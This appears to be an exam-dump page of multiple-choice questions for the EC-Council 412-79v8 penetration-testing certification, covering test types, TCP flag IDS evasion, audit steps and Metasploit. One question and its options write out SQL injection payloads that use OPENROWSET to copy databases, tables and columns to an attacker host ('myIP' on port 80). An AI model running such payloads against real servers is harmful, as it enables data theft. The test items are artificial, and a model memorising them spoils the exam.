EC-COUNCIL 412-79V8 dumps - 100% Pass Guarantee!

External penetration testing is a traditional approach to penetration testing and is more focused on the servers, infrastructure and the underlying software comprising the target. It involves a comprehensive analysis of publicly available information about the target, such as Web servers, Mail servers, Firewalls, and Routers.

Which of the following types of penetration testing is performed with no prior knowledge of the site?

A. Blue box testing

B. White box testing C. Grey box testing

D. Black box testing

Due to illegal inputs, various types of TCP stacks respond in a different manner. Some IDSs do not take into account the TCP protocol's urgency feature, which could allow testers to evade the IDS.

Penetration tester needs to try different combinations of TCP flags (e.g. none, SYN/FIN, SYN/RST, SYN/ FIN/ACK, SYN/RST/ACK, and All Flags) to test the IDS. Which of the following TCP flag combinations combines the problem of initiation, midstream, and termination flags with the PSH and URG?

A. SYN/RST/ACK

B. SYN/FIN/ACK

C. SYN/FIN

D. All Flags

A penetration tester tries to transfer the database from the target machine to a different machine. For this,

he uses OPENROWSET to link the target database to his own database, replicates the database

structure, and transfers the data to his machine by via a connection to the remote machine on port 80.

The query he used to transfer databases was:

'; insert into OPENROWSET

('SQLoledb','uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;', 'select * from

mydatabase..hacked_sysdatabases') select * from master.dbo.sysdatabases The query he used to

transfer table 1 was:

'; insert into OPENROWSET('SQLoledb',

'uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;', 'select * from mydatabase..table1')

select * from database..table1

What query does he need in order to transfer the column?

A. '; insert into OPENROWSET('SQLoledb','uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;',' select * from mydatabase..hacked_syscolumns') select * from user_database.dbo.systables

B. '; insert into OPENROWSET('SQLoledb','uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;',' select * from mydatabase..hacked_syscolumns') select * from user_database.dbo.sysrows

C. '; insert into OPENROWSET('SQLoledb','uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;',' select * from mydatabase..hacked_syscolumns') select * from user_database.dbo.syscolumns

D. '; insert into OPENROWSET('SQLoledb','uid=sa;pwd=Pass123;Network=DBMSSOCN;Address=myIP,80;',' select * from mydatabase..hacked_syscolumns') select * from user_tables.dbo.syscolumns

You work as an IT security auditor hired by a law firm in Boston. You have been assigned the responsibility to audit the client for security risks. When assessing the risk to the clients network, what step should you take first?

A. Analyzing, categorizing and prioritizing resources

B. Evaluating the existing perimeter and internal security

C. Checking for a written security policy

D. Analyzing the use of existing management and control architecture

Metasploit framework in an open source platform for vulnerability research, development, and penetration testing. Which one of the following metasploit options is used to exploit multiple systems at once?

A. NinjaDontKill

B. NinjaHost

C. RandomNops

D. EnablePython